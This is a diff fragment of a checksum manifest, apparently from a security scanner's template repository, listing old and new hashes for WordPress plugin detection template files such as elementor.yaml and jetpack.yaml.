-http/technologies/wordpress/plugins/disable-comments.yaml:17bf971d235512882468500fd5c01d08787ba51e -http/technologies/wordpress/plugins/disable-gutenberg.yaml:7c994799203502ffe91dd53a9f5bc19eab80eaa4 -http/technologies/wordpress/plugins/duplicate-page.yaml:bb85eb59c065c7498994863db13ba35197280f00 -http/technologies/wordpress/plugins/duplicate-post.yaml:3b236b529e6d13fecac066b773b06de10062d9ce -http/technologies/wordpress/plugins/duplicator.yaml:3ee95c40e42cc37c3bab966b3772147f8300f74e -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:9f6ac333ebda2da69d43619506c36e40189c5af9 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:dc2095558be073a2330fccfc86b78e385768ba6e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/copy-delete-posts.yaml:1c9bb377abbf336c9ab111f368f48d8f8ec3927c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:80ee9d72a05fa607b3bac8d43eaffdc294784889 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:c5676cb3ffcf4cd88144a09e5d6acffcd2ce62f1 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:fdd2c32e4640843aacc4fce1d65a3175e32c988a +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13910c72122557903a40002d0f0dcd242980da26 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d309d38c03a71e38b5db0ca66585bd0680a7a290 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:0b7213584aae71c6cdb9fc20805d3d7e8ea0020d -http/technologies/wordpress/plugins/elementor.yaml:626cb5ab7dab2c66c3dd77664e86234c95a04a0a -http/technologies/wordpress/plugins/elementskit-lite.yaml:9d4f449c1ca40c8ddf476d30cfefa4789b3f916e -http/technologies/wordpress/plugins/enable-media-replace.yaml:020261cace7ee6d72aad40840e1b35530e257cb9 -http/technologies/wordpress/plugins/envato-elements.yaml:2481686867f7f64a1ca4ee1c4d6f3b619fbac343 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:9bb1a73c69212334abf528e1f45d22b29d4e87b6 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:4ddebc4724d5080773ff6cc495743fbe1bf24a7e -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:49b7edb24e1e5bf6626c607cf07760d462ec8699 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:bc92fd9a05b49e7ad5bcd47090b366441034f3d2 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:821567b18329a798aa51dac9a433cb5a4b047f8b -http/technologies/wordpress/plugins/flamingo.yaml:fc63e24dd3b1c0170c0614f24b55274b5675acce -http/technologies/wordpress/plugins/fluentform.yaml:029cc6d0d253187f75c841a6d882be7475eb025c -http/technologies/wordpress/plugins/font-awesome.yaml:e106fe2861123a88b49f8d234a7791bf5f239925 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:08dc96b1d9b06006b14c1b1424890d357517adff -http/technologies/wordpress/plugins/formidable.yaml:14c2a55f7eb2efc0335a6f8379a79546510055ba -http/technologies/wordpress/plugins/forminator.yaml:6cea26500ae1eca48a642c696155f8d69aced96a -http/technologies/wordpress/plugins/ga-google-analytics.yaml:c0cead48d6831a995f92d62dfcc539b3a3aa2bf8 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:926cf9f55fb4f1d3e5799f542276cbe8a93e265f -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:42c75aa0b585fd473de185bf4b6a35b1d10a209f -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:f4096f4b01143b07d63b8489cf1f926ba2d56f6a -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:56c368365af36b3ed97c9dacaa97303beb054460 -http/technologies/wordpress/plugins/google-site-kit.yaml:8e1e6be4a1e7edbb86c5ef9191a6ea5216ba422c -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:ccb8e4886601d600257ba573d1cde9f5056ae609 -http/technologies/wordpress/plugins/gtranslate.yaml:65b089d70ff17791fd055903e7d25052d27ea22b -http/technologies/wordpress/plugins/gutenberg.yaml:6eddabc971567271983d4bcc932b641b66cc5817 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:41933481ae2706a68c0f59b39f9eb9ae8385f119 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:c64112a2a3423112f22659daf2845f7394e57725 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:fcb6316047b3cb92d6a79b6b3cd0bc5ec7410d8f +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:3a6a408c680afed419fd5cff87843d842fb53175 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:2f93216319633715b88eadfeb45c0e4f0fc1a9e7 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:db9313e5c1ba6ee717bdcaf28ca5bf4aef6282f4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:9d929db3fc9b416ea6f760501457fef16bcacb16 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:150a0ecaae2c556eafcfdf9f4de718beadf89918 -http/technologies/wordpress/plugins/header-footer.yaml:815c2ee6e5a9b82c56ad8650caa805870db9ff0f -http/technologies/wordpress/plugins/health-check.yaml:7ee22dafdbf7918e4b8e9104f699683fc99a80a1 -http/technologies/wordpress/plugins/hello-dolly.yaml:2f54714090ae1d0431211411df27c8e22658245f -http/technologies/wordpress/plugins/host-webfonts-local.yaml:7e48c494aadc9777a557163bb5ac74a9bf6efaa6 -http/technologies/wordpress/plugins/hostinger.yaml:4e69497c7ded8214732dda278dba2e85cdfdbfc8 -http/technologies/wordpress/plugins/image-optimization.yaml:efe7672f6ae04ada87423e83f8178a49e29e2da8 -http/technologies/wordpress/plugins/imagify.yaml:6b0ea598465e4a385b6ad318ca29b0decc8e56da -http/technologies/wordpress/plugins/imsanity.yaml:ab1fa837734c7ef8ad8d0a1103b8b64b0c9ca616 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:617ad48b4dc0618c863ea24d343714ded578db10 -http/technologies/wordpress/plugins/instagram-feed.yaml:15fd435551a5048705e4840f82993cab87bf3c2f -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:0a55ec3f11547a3dec2d47bab0fb1b58d2c4d4d4 -http/technologies/wordpress/plugins/iwp-client.yaml:83681acf0d9709933fc94a16c9c8855248358fe0 -http/technologies/wordpress/plugins/jetpack-boost.yaml:399a6369109c5843757034d1da708eaa3cd2d12f -http/technologies/wordpress/plugins/jetpack.yaml:975b5bf1503f07fe3a884c4750f7f1f996801864 -http/technologies/wordpress/plugins/kadence-blocks.yaml:6939c253425582b09053113cfc3b5fcf350fb6ce -http/technologies/wordpress/plugins/kirki.yaml:02f30f16fe215e2c770371bbcd9386c15ab21a8b -http/technologies/wordpress/plugins/leadin.yaml:56d9f4233670ae02489b290586af688cbe98a674 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:8c6f7625ca5b7cd63c75724d4ce2024a2ce4cb17 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:343a7a0fa40e0ef1e44e42ae26032b5c18be08c4 -http/technologies/wordpress/plugins/litespeed-cache.yaml:8a08360368faa283647eb61d181bc58576c188a9 -http/technologies/wordpress/plugins/loco-translate.yaml:9793519ee3c12c1ac03a7a2e764a39ef94fa0225 -http/technologies/wordpress/plugins/loginizer.yaml:fff60d4f9fc64f9072b516f3561f0ed774340265 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/hostinger.yaml:5528d42fea5183ffda7073d1c116da79afb63cf3 +http/technologies/wordpress/plugins/image-optimization.yaml:fd00671fcb1a927454714d707e89e62b40f6a329 +http/technologies/wordpress/plugins/imagify.yaml:b82e202b7774603cc5dfc671f09e78399cd6a82b +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:e2398e4c0e2ea31019da3715d6aed35ccc0f6729 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:be5174a80ec6c119a05428acdc1218fac85a6795 +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:097095a5736e380f9a20faace84f3c2ec6dcb1d6 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c1c4525e3a13d1b8755d71f688856dc2aa1a5e6 -http/technologies/wordpress/plugins/mailpoet.yaml:fb5cb053c2ae4ffc8f7fa3014fec690084d116b4 -http/technologies/wordpress/plugins/maintenance.yaml:36c58713490b3cd792146d3958eec577d781d91b -http/technologies/wordpress/plugins/mainwp-child.yaml:e5b317e005065759e49d5ab917e61efa328c4148 -http/technologies/wordpress/plugins/malcare-security.yaml:3062fa735ca059c3108178a905915bbdce8770e2 -http/technologies/wordpress/plugins/megamenu.yaml:0e891f048b5039a93c720ea45cb268a79c91acff -http/technologies/wordpress/plugins/members.yaml:1ab20c321dbb8d700e961c8a4408206154cdeb37 -http/technologies/wordpress/plugins/meta-box.yaml:bc3d9265003f9deb9be44b5d241075af96635e67 -http/technologies/wordpress/plugins/metform.yaml:6bb5137d3ce6707303ba2cf9d3c13ac64dd15113 -http/technologies/wordpress/plugins/ml-slider.yaml:ef7949cb3f15d0d9f0dd4d3a807195a85bcf4f0b -http/technologies/wordpress/plugins/newsletter.yaml:0607f3e5d9c6c4a214201034bc3ed5a2316e7508 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:67a13f89f662beee918b4dda7831bd1c1d5e2bb3 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:c35c66af78d76d1fec4c4d31fd27e7c7e93c37d3 -http/technologies/wordpress/plugins/ninja-forms.yaml:bdaadfe51fcc931161b8f80aebbd4b4db010d020 -http/technologies/wordpress/plugins/ocean-extra.yaml:547c4697053701ea63bd84bfd3efc7f49471163b -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:3f80245ce9daa1f3b881242973f001a0b11bcfc9 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:42cf67e5f582d48ba5dca2769196513e9b6b33ae -http/technologies/wordpress/plugins/optinmonster.yaml:17e5f50fefd4de8943f59446fef3c5311583c2a1 -http/technologies/wordpress/plugins/otter-blocks.yaml:3eb86f168eb2e2ae83103564ac30973c7738ef34 -http/technologies/wordpress/plugins/password-protected.yaml:cb751d092eccbb55e508218d4fd26bc9214fa38d -http/technologies/wordpress/plugins/pdf-embedder.yaml:75ef6e9fa30ae7b3dc50582f80ad203742a734cb +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:80de34e84d55586e5eda37d00d277aad7f4b2451 +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/metform.yaml:aaa8b95a995e3345112a288f66e705b150968e7e +http/technologies/wordpress/plugins/ml-slider.yaml:104ad761a31985f8f0947e3e0b9bf872fe1f2c2a +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:f00d03dc0f365956376cec268c45bd669729260e +http/technologies/wordpress/plugins/ninja-forms.yaml:cc29026bcd3c62478d5147fd80a8b3a560bfe728 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 +http/technologies/wordpress/plugins/password-protected.yaml:b990fff1f3337e512694df82458fcf4d4f50c85c +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:f645ab278fbec6f8f84d96c1e8c662e25511504e -http/technologies/wordpress/plugins/pixelyoursite.yaml:49e26414f13a2e0735ad527e9ac13f28c56198ae -http/technologies/wordpress/plugins/polylang.yaml:8d7890918929065cd2164e60f9b35129c9db1c45 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 +http/technologies/wordpress/plugins/pixelyoursite.yaml:ba9797f8208c7c3ed5cb45048764d8ecd0a62835 +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:4aa0202f8b6228c8fe5b06cd089e05d9bb0f8403 -http/technologies/wordpress/plugins/post-smtp.yaml:3f6ca554323ef2ce89e000b022d787f9427cd344 -http/technologies/wordpress/plugins/post-types-order.yaml:7e95faf3592f917f1c678f09dfa888c7daa9de25 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:2a0ad308ce48bc58be5d1f9e6c2ecf38a5650d8f -http/technologies/wordpress/plugins/pretty-link.yaml:2e9c908812b920884036fb8986db7e89d31a7fa9 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:d5b83b794de5c49e3b00b7e155407e32a6611381 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:5fb5a43efab0c6efcf12464f37c4b76a0df9713a -http/technologies/wordpress/plugins/redirection.yaml:ae6e69eb4d0d16d73205ee8312e0d1923bca1650 -http/technologies/wordpress/plugins/redux-framework.yaml:20792b97ad718747b0ff306dfc0ca2f6f5413891 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:7f77d0d60a5e9dc5c415d6a455d9b34f97739827 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:e167064dae9b6687cca74ca5dcc40199743e6850 -http/technologies/wordpress/plugins/safe-svg.yaml:52f78b3afb767263ac043fcbf9e4c5ef748ca4a8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:1878b272237d6c74ea1ccbb29449b3892febdde8 -http/technologies/wordpress/plugins/sg-cachepress.yaml:d3f3141bb94a6fd8947a556c3f3a629e572ea6f1 -http/technologies/wordpress/plugins/sg-security.yaml:5985d766d703614094da30d6e2b47cfa6e6b610a -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:df4a730b654085bd9dafd8b39266311a7e8f0ff3 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:fc56db041a7bc55dc8b0cea3bf463d634cef456a -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:070eb5c5a81b9009658f7bf60cda1201e5948694 -http/technologies/wordpress/plugins/simple-history.yaml:79f8fd2c9bbcb4a7ae9dfb090f1988951873c0a0 +http/technologies/wordpress/plugins/popup-maker.yaml:0838742608b1265516017095ccd495332e6a5991 +http/technologies/wordpress/plugins/post-smtp.yaml:754dd57d96b6f4456c570c7034a2ddf3056539f4 +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:195ac372f24aa1feb8c48fba65a97149f05e137f +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:9f6476b40090f693001f2da81075d5b3e650c2e3 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:d3871c6333178618d88df609d41ea9e626c1e312 +http/technologies/wordpress/plugins/sg-cachepress.yaml:557b4e350cd47eafc012c39dad25d48d6b397de0 +http/technologies/wordpress/plugins/sg-security.yaml:4d092558c2718bd98454bbec4adf942903cec393 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/simple-history.yaml:8441cfcd6437b914c70f78136d76cdeb85e261a0 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:2541f38b34cf9176757a951416df984459474001 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:5788849f51a8c62ea3f8ac1e9e87a2ca8c8347ac -http/technologies/wordpress/plugins/smart-slider-3.yaml:0261ca0102754ae424798049758fba0a8eab989b -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:0f6e12ee31e0e9ce049dde916dab76eb5ce89599 +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f3961e9e08694816f33e638acf1af19b4262a840 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:2ff53cc8ab79e2209368909504ebcf69fd236d77 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:7743a111682d3c98b42006fe6fee4ab6c10e9d9a -http/technologies/wordpress/plugins/sucuri-scanner.yaml:167837714fb29324f5d9ed149ae14b15dccf0197 -http/technologies/wordpress/plugins/svg-support.yaml:72eeb735ec9f01c4a69fd1f312dd0dc5a66cd349 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:c7548ce19158f03d385da391ee3f7b07a26d776a -http/technologies/wordpress/plugins/tablepress.yaml:3b8fcce3281d05f97941f62f34027c39330acbbb -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:8a63ad445136f67a664be61bc488d48a7be42db6 -http/technologies/wordpress/plugins/templately.yaml:6c6e2b2c55a618ba1b079d3631373241e33089de -http/technologies/wordpress/plugins/the-events-calendar.yaml:bdd9b52ed7949d6720757d1e5edb2d0ea190801b +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:9edb30d645fe661041ea30371023297ba0f84558 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/templately.yaml:c38b29f2acd823339a5f6e47b6da7d81815bf75b +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:04abe0cc2b1cf4de7d3006f3254faab6d156e496 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:2137cd88afffb9633c98efbaf76aa2e5c70847d7 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:e019aa8cfc25a8faa6a42d45b84fb20f37d2a8b7 -http/technologies/wordpress/plugins/under-construction-page.yaml:af366e70b8fc95dce4e8d2b46f10e5bc007e71f3 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:5fc184d6e1eb819dc98519af81c48502b499de9a +http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:2c4a12b979ea620707afebca080b6aa46ccb3a66 +http/technologies/wordpress/plugins/updraftplus.yaml:0869ebd3a5621b5613665f63be4e3bdb52d4f58e http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:a65c56f1bb92e3af7f93283d6fc6298ec02758fb +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:45602550c883518190fe4e0a9a65e48446ef72da -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:85ef6f5b148eca06e1eafe17ed5609a5fb54e8dd -http/technologies/wordpress/plugins/webp-express.yaml:7eb073175e1d2f71226682791e56ef0205c73f06 